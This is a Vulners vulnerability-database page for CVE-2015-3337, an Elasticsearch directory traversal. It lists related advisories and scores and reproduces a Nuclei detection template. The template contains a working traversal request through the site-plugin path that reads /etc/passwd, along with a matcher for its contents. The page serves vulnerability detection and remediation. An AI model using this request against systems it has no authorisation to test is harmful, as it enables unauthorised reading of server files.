Vulners
Lucene search
Elasticsearch - Local File Inclusion
| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
 | ElasticSearch 1.4.5 / 1.5.2 - Path Transversal Vulnerability | 21 May 201500:00 | – | zdt |
 | elasticsearch -- directory traversal attack with site plugins | 27 Apr 201500:00 | – | freebsd |
 | CVE-2015-3337 | 6 Dec 202313:16 | – | circl |
 | Elasticsearch Arbitrary File Disclosure Vulnerability | 30 Apr 201500:00 | – | cnvd |
 | CVE-2015-3337 | 1 May 201515:00 | – | cve |
 | CVE-2015-3337 | 1 May 201515:00 | – | cvelist |
 | [SECURITY] [DSA 3241-1] elasticsearch security update | 29 Apr 201520:32 | – | debian |
 | Debian DSA-3241-1 : elasticsearch - security update | 30 Apr 201500:00 | – | nessus |
| FreeBSD : elasticsearch -- directory traversal attack with site plugins (a71e7440-1ba3-11e5-b43d-002590263bf5) | 26 Jun 201500:00 | – | nessus |
 | ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal | 18 May 201500:00 | – | exploitdb |
10
id: CVE-2015-3337
info:
name: Elasticsearch - Local File Inclusion
author: pdteam
severity: medium
description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server.
remediation: |
Upgrade to a patched version of Elasticsearch or apply the necessary security patches.
reference:
- https://www.exploit-db.com/exploits/37054/
- https://www.elastic.co/community/security
- http://www.debian.org/security/2015/dsa-3241
- https://nvd.nist.gov/vuln/detail/CVE-2015-3337
- http://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.html
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2015-3337
cwe-id: CWE-22
epss-score: 0.33129
epss-percentile: 0.98148
cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: elasticsearch
product: elasticsearch
fofa-query: index_not_found_exception
tags: cve2015,cve,packetstorm,edb,elastic,lfi,elasticsearch,plugin,vuln
http:
- method: GET
path:
- "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022031903cedaac4b2a9de92a60959a9214a3325ab9cebf25a4725a444ed694fb45d022100d9be7eab7719edf5ee111b45a1f77a9226fcb2a3775165fdf9e5161dc9fa961f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 24.3
EPSS0.33129